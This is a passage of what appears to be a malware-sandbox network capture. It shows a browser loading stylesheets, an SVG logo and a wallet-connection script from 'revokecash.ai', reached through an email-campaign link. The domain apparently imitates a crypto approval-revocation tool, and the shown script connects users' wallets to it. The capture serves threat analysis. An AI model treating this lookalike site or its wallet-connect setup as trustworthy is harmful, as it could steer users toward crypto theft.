                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:16 GMTContent-Type: text/css; charset=UTF-8Content-Length: 19493Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:36 GMTETag: W/"4c25
                                                                          2023-12-10 16:44:16 UTC648INData Raw: 2e 63 73 73 2d 62 36 32 6d 33 74 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 0a 7d 0a 0a 2e 63 73 73 2d 37 70 67 30 63 6a 2d 61 31 31 79 54 65 78 74 20 7b 0a 09 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 0a 09 62 6f 72 64 65 72 3a 20 30 70 78 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 77 68 69 74 65 2d 73 70 61 63 65
                                                                          Data Ascii: .css-b62m3t-container {position: relative;box-sizing: border-box;}.css-7pg0cj-a11yText {z-index: 9999;border: 0px;clip: rect(1px, 1px, 1px, 1px);height: 1px;width: 1px;position: absolute;overflow: hidden;padding: 0px;white-space
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 09 6f 75 74 6c 69 6e 65 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 0a 7d 0a 0a 2e 63 73 73 2d 31 30 70 33 36 37 39 2d 63 6f 6e 74 72 6f 6c 3a 68 6f 76 65 72 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 33 39 2c 20 33 39 2c 20 34 32 29 3b 0a 09 0a 7d 0a 0a 2e 63 73 73 2d 31 35 70 70 39 6f 61 20 7b 0a 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 09 66 6c 65 78 3a 20 31 20 31 20 30 25 3b 0a 09 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a
                                                                          Data Ascii: g: border-box;color: white;outline: 0px !important;}.css-10p3679-control:hover {background-color: rgb(39, 39, 42);}.css-15pp9oa {-webkit-box-align: center;align-items: center;display: grid;flex: 1 1 0%;flex-wrap: wrap;position:
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 0a 7d 0a 0a 2e 63 73 73 2d 37 70 67 30 63 6a 2d 61 31 31 79 54 65 78 74 20 7b 0a 09 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 0a 09 62 6f 72 64 65 72 3a 20 30 70 78 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 09 0a
                                                                          Data Ascii: container {position: relative;box-sizing: border-box;}.css-7pg0cj-a11yText {z-index: 9999;border: 0px;clip: rect(1px, 1px, 1px, 1px);height: 1px;width: 1px;position: absolute;overflow: hidden;padding: 0px;white-space: nowrap;
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 3a 20 31 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 6c 65 66 74 3a 20 2d 31 30 30 70 78 3b 0a 09 6f 70 61 63 69 74 79 3a 20 30 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 30 31 29 3b 0a 09 0a 7d 0a 0a 2e 63 73 73 2d 31 30 73 63 6b 39 70 20 7b 0a 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 61 6c 69 67 6e 2d 73 65 6c 66 3a 20 73 74 72 65 74 63 68 3b 0a 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 20 30 3b 0a 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 70 61
                                                                          Data Ascii: : 1px;color: transparent;left: -100px;opacity: 0;position: relative;transform: scale(0.01);}.css-10sck9p {-webkit-box-align: center;align-items: center;align-self: stretch;display: flex;flex-shrink: 0;box-sizing: border-box;pa
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 73 70 69 6e 6e 65 72 3b 0a 09 0a 7d 0a 0a 2e 6e 70 72 6f 67 72 65 73 73 2d 63 75 73 74 6f 6d 2d 70 61 72 65 6e 74 20 7b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 0a 7d 0a 0a 2e 6e 70 72 6f 67 72 65 73 73 2d 63 75 73 74 6f 6d 2d 70 61 72 65 6e 74 20 23 6e 70 72 6f 67 72 65 73 73 20 2e 62 61 72 2c 20 2e 6e 70 72 6f 67 72 65 73 73 2d 63 75 73 74 6f 6d 2d 70 61 72 65 6e 74 20 23 6e 70 72 6f 67 72 65 73 73 20 2e 73 70 69 6e 6e 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 64 69 61 6c 6f 67 20 7b 0a 09 7a 2d 69 6e 64 65 78 3a
                                                                          Data Ascii: spinner;}.nprogress-custom-parent {overflow: hidden;position: relative;}.nprogress-custom-parent #nprogress .bar, .nprogress-custom-parent #nprogress .spinner {position: absolute;}.-cbwsdk-css-reset .-cbwsdk-connect-dialog {z-index:
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 67 3a 20 33 30 70 78 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 2e 6c 69 67 68 74 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 2e 64 61 72 6b 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 31 30 2c 20 31 31 2c 20 31 33 29 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 66 6c
                                                                          Data Ascii: g: 30px;}.-cbwsdk-css-reset .-cbwsdk-connect-content.light {background: rgb(255, 255, 255);}.-cbwsdk-css-reset .-cbwsdk-connect-content.dark {background: rgb(10, 11, 13);}.-cbwsdk-css-reset .-cbwsdk-connect-content-header {display: fl
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 63 6f 6c 75 6d 6e 3b 0a 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 2d 71 72 2d 63 6f 6e 6e 65 63 74 69 6e 67 2e 6c 69 67 68 74 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 39 35 29 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 2d 71 72 2d 63 6f 6e 6e 65 63 74 69 6e 67 2e 6c 69 67 68 74 20 3e 20 70 20 7b 0a 09 63 6f 6c 6f 72 3a
                                                                          Data Ascii: column;align-items: center;justify-content: center;}.-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting.light {background-color: rgba(255, 255, 255, 0.95);}.-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting.light > p {color:
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 3a 20 31 30 30 25 3b 0a 09 6c 69 73 74 2d 73 74 79 6c 65 3a 20 64 65 63 69 6d 61 6c 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 77 61 6c 6c 65 74 2d 73 74 65 70 73 2d 69 74 65 6d 20 7b 0a 09 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 64 65 63 69 6d 61 6c 3b 0a 09 64 69 73 70 6c 61 79 3a 20 6c 69 73 74 2d 69 74 65 6d 3b 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63
                                                                          Data Ascii: : 100%;list-style: decimal;}.-cbwsdk-css-reset .-cbwsdk-wallet-steps-item {list-style-type: decimal;display: list-item;font-style: normal;font-weight: 400;font-size: 16px;line-height: 24px;margin-top: 20px;}.-cbwsdk-css-reset .-c
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 20 7b 0a 09 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 69 74 65 6d 2e 64 61 72 6b 2e 73 65 6c 65 63 74 65 64 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 30 2c 20 31 36 2c 20 35 31 29 3b 0a 09 63 6f 6c 6f 72 3a 20 72 67 62 28 38 38 2c 20 31 33 38 2c 20 32 34 35 29 3b 0a 09 0a 7d 0a 0a 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 69 74 65 6d 2e 73 65 6c 65 63 74 65 64 20 7b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 09 0a 7d 0a 0a 2e 2d
                                                                          Data Ascii: {color: rgb(255, 255, 255);}.-cbwsdk-css-reset .-cbwsdk-connect-item.dark.selected {background: rgb(0, 16, 51);color: rgb(88, 138, 245);}.-cbwsdk-css-reset .-cbwsdk-connect-item.selected {border-radius: 100px;font-weight: 600;}.-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.549717104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:15 UTC837OUTGET /_img/revoke.svg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:16 UTC705INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 31 34 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 31 30 32 65 2d 31 38 63 35 33 33 32 35 62 37
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:16 GMTContent-Type: image/svg+xmlContent-Length: 4142Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"102e-18c53325b7
                                                                          2023-12-10 16:44:16 UTC664INData Raw: 3c 73 76 67 20 68 65 69 67 68 74 3d 22 34 34 35 2e 30 34 35 34 34 6d 6d 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 31 38 2e 37 35 33 30 33 20 34 34 2e 35 30 34 35 34 34 22 20 77 69 64 74 68 3d 22 32 31 38 37 2e 35 33 30 33 6d 6d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 67 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 2e 32 36 34 35 38 33 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 36 32 2e 36 33 33 35 32 20 2d 35 33 2e 36 30 33 30 37 39 29 22 3e 3c 70 61 74 68 20 64 3d 22 6d 31 33 32 2e 33 35 36 38 31 20 39 35 2e 30 30 36 39 35 2d 35 2e 31 38 31 36 2d 31 35 2e 39 35 31 31 39 39 63 34 2e 33 36 38 38 2d 31 2e 36 32 35 36 20 36 2e 37 35 36 34 2d 35 2e 33
                                                                          Data Ascii: <svg height="445.04544mm" viewBox="0 0 218.75303 44.504544" width="2187.5303mm" xmlns="http://www.w3.org/2000/svg"><g stroke-width=".264583" transform="translate(-62.63352 -53.603079)"><path d="m132.35681 95.00695-5.1816-15.951199c4.3688-1.6256 6.7564-5.3
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 38 2e 38 39 6c 31 2e 34 32 32 34 2d 39 2e 30 34 32 34 68 2d 31 39 2e 32 35 33 32 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 37 37 2e 33 34 33 33 39 20 39 35 2e 30 30 36 39 35 20 31 36 2e 34 35 39 32 2d 33 38 2e 33 30 33 31 39 39 68 2d 31 31 2e 32 32 36 38 6c 2d 35 2e 33 33 34 20 31 35 2e 37 34 38 63 2d 31 2e 30 31 36 20 33 2e 30 39 38 38 2d 31 2e 36 37 36 34 20 36 2e 31 34 36 38 2d 32 2e 36 34 31 36 20 39 2e 32 34 35 36 68 2d 2e 31 30 31 36 63 2e 31 30 31 36 2d 33 2e 30 39 38 38 2e 33 35 35 36 2d 36 2e 31 34 36 38 2e 33 35 35 36 2d 39 2e 32 34 35 36 6c 2e 30 35 30 38 2d 31 35 2e 37 34 38 68 2d 31 30 2e 38 37 31 32 6c 32 2e 37 34 33 32 20 33 38 2e 33 30 33 31 39 39 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 39 32 2e 36 38 31 38 31 20 37 35 2e 38 35 35
                                                                          Data Ascii: 8.89l1.4224-9.0424h-19.2532z"/><path d="m177.34339 95.00695 16.4592-38.303199h-11.2268l-5.334 15.748c-1.016 3.0988-1.6764 6.1468-2.6416 9.2456h-.1016c.1016-3.0988.3556-6.1468.3556-9.2456l.0508-15.748h-10.8712l2.7432 38.303199z"/><path d="m192.68181 75.855
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 36 20 31 36 39 2e 33 34 20 31 32 35 2e 37 31 34 30 30 33 36 20 32 32 35 2e 37 35 33 20 32 37 2e 34 31 39 20 32 32 2e 38 35 31 20 35 37 2e 30 36 34 20 34 32 2e 35 32 36 20 38 39 20 35 38 2e 34 39 34 20 31 30 2e 36 31 31 20 35 2e 33 30 35 20 32 34 2e 36 32 33 20 31 34 2e 38 37 31 20 33 37 20 31 32 2e 32 33 35 20 31 30 2e 33 33 2d 32 2e 32 20 32 30 2e 36 31 37 2d 38 2e 35 34 33 20 33 30 2d 31 33 2e 32 33 35 20 32 32 2e 33 35 31 2d 31 31 2e 31 37 37 20 34 33 2e 39 39 36 2d 32 34 2e 33 39 35 20 36 34 2d 33 39 2e 33 37 34 20 37 33 2e 36 31 38 2d 35 35 2e 31 32 33 20 31 32 39 2e 30 36 2d 31 33 33 2e 33 30 32 20 31 34 35 2e 35 37 36 2d 32 32 34 2e 38 37 33 20 36 2e 37 35 36 2d 33 37 2e 34 36 31 20 35 2e 34 32 34 2d 37 35 2e 30 39 20 35 2e 34 32 34 2d 31 31 33 76
                                                                          Data Ascii: 6 169.34 125.7140036 225.753 27.419 22.851 57.064 42.526 89 58.494 10.611 5.305 24.623 14.871 37 12.235 10.33-2.2 20.617-8.543 30-13.235 22.351-11.177 43.996-24.395 64-39.374 73.618-55.123 129.06-133.302 145.576-224.873 6.756-37.461 5.424-75.09 5.424-113v
                                                                          2023-12-10 16:44:16 UTC740INData Raw: 32 39 2e 33 30 34 34 37 2d 2e 38 35 38 36 37 20 35 38 2e 31 32 36 31 39 20 34 2e 35 36 31 34 32 20 38 37 2e 30 35 33 37 36 20 31 39 2e 31 32 36 31 31 20 31 30 32 2e 30 37 36 34 38 20 39 38 2e 35 39 30 33 36 34 20 31 38 36 2e 36 39 37 36 38 20 31 39 33 2e 32 38 38 30 34 34 20 32 32 35 2e 35 34 38 33 39 76 2d 34 35 39 2e 39 39 39 39 39 38 63 2d 36 2e 39 31 32 38 36 20 32 2e 35 31 35 36 36 2d 31 33 2e 32 31 35 33 35 20 36 2e 36 33 37 38 35 2d 31 39 2e 37 38 34 39 34 20 39 2e 39 32 33 31 34 2d 31 31 2e 30 37 31 36 36 20 35 2e 35 33 35 38 33 2d 32 32 2e 38 37 35 33 36 20 31 30 2e 35 34 30 34 33 2d 33 34 2e 36 32 33 36 36 20 31 34 2e 34 35 36 38 36 2d 33 33 2e 39 35 35 39 31 20 31 31 2e 33 32 30 39 35 2d 37 30 2e 39 38 39 33 38 20 31 37 2e 37 30 39 35 31 2d 31
                                                                          Data Ascii: 29.30447-.85867 58.12619 4.56142 87.05376 19.12611 102.07648 98.590364 186.69768 193.288044 225.54839v-459.999998c-6.91286 2.51566-13.21535 6.63785-19.78494 9.92314-11.07166 5.53583-22.87536 10.54043-34.62366 14.45686-33.95591 11.32095-70.98938 17.70951-1


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.549718104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:15 UTC806OUTGET /walletConnect.js HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:15 UTC692INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 35 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 45 54 61 67 3a 20 57 2f 22 31 31 61 36 2d 4f 77 6b 6d 6b 59 4f 6c 4d 74 48 75 30 39 54 7a 30 70 6e 50 72 34 61 42 61 49 30 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:15 GMTContent-Type: text/javascript; charset=utf-8Content-Length: 4518Connection: closeX-Powered-By: ExpressETag: W/"11a6-OwkmkYOlMtHu09Tz0pnPr4aBaI0"Cache-Control: max-age=14400CF-Cache-Status:
                                                                          2023-12-10 16:44:15 UTC677INData Raw: 77 69 6e 64 6f 77 2e 70 72 6f 63 65 73 73 20 3d 20 7b 20 62 72 6f 77 73 65 72 3a 20 74 72 75 65 2c 20 65 6e 76 3a 20 7b 20 45 4e 56 49 52 4f 4e 4d 45 4e 54 3a 20 27 42 52 4f 57 53 45 52 27 20 7d 20 7d 3b 0a 0a 69 6d 70 6f 72 74 20 7b 0a 20 20 45 74 68 65 72 65 75 6d 43 6c 69 65 6e 74 2c 0a 20 20 77 33 6d 43 6f 6e 6e 65 63 74 6f 72 73 2c 0a 20 20 77 33 6d 50 72 6f 76 69 64 65 72 2c 0a 20 20 57 61 67 6d 69 43 6f 72 65 2c 0a 20 20 57 61 67 6d 69 43 6f 72 65 43 68 61 69 6e 73 2c 0a 20 20 57 61 67 6d 69 43 6f 72 65 43 6f 6e 6e 65 63 74 6f 72 73 2c 0a 7d 20 66 72 6f 6d 20 22 68 74 74 70 73 3a 2f 2f 75 6e 70 6b 67 2e 63 6f 6d 2f 40 77 65 62 33 6d 6f 64 61 6c 2f 65 74 68 65 72 65 75 6d 40 32 2e 37 2e 31 22 3b 0a 0a 69 6d 70 6f 72 74 20 7b 20 57 65 62 33 4d 6f 64
                                                                          Data Ascii: window.process = { browser: true, env: { ENVIRONMENT: 'BROWSER' } };import { EthereumClient, w3mConnectors, w3mProvider, WagmiCore, WagmiCoreChains, WagmiCoreConnectors,} from "https://unpkg.com/@web3modal/ethereum@2.7.1";import { Web3Mod
                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 20 3d 20 63 72 65 61 74 65 43 6f 6e 66 69 67 28 7b 0a 09 61 75 74 6f 43 6f 6e 6e 65 63 74 3a 20 74 72 75 65 2c 0a 09 63 6f 6e 6e 65 63 74 6f 72 73 3a 20 77 33 6d 43 6f 6e 6e 65 63 74 6f 72 73 28 7b 20 70 72 6f 6a 65 63 74 49 64 2c 20 63 68 61 69 6e 73 2c 20 6f 70 74 69 6f 6e 73 3a 20 7b 0a 09 09 6d 65 74 61 64 61 74 61 3a 20 7b 0a 09 09 09 6e 61 6d 65 3a 20 27 72 65 76 6f 6b 65 63 61 73 68 2e 61 69 27 2c 0a 09 09 09 75 72 6c 3a 20 27 68 74 74 70 73 3a 2f 2f 72 65 76 6f 6b 65 63 61 73 68 2e 61 69 2f 27 2c 0a 09 09 7d 2c 0a 09 7d 20 7d 29 2c 0a 09 70 75 62 6c 69 63 43 6c 69 65 6e 74 0a 7d 29 0a 63 6f 6e 73 74 20 65 74 68 65 72 65 75 6d 43 6c 69 65 6e 74 20 3d 20 6e 65 77 20 45 74 68 65 72 65 75 6d 43 6c 69 65 6e 74 28 77 61 67 6d 69 43 6f 6e 66 69 67 2c 20
                                                                          Data Ascii: = createConfig({autoConnect: true,connectors: w3mConnectors({ projectId, chains, options: {metadata: {name: 'revokecash.ai',url: 'https://revokecash.ai/',},} }),publicClient})const ethereumClient = new EthereumClient(wagmiConfig,
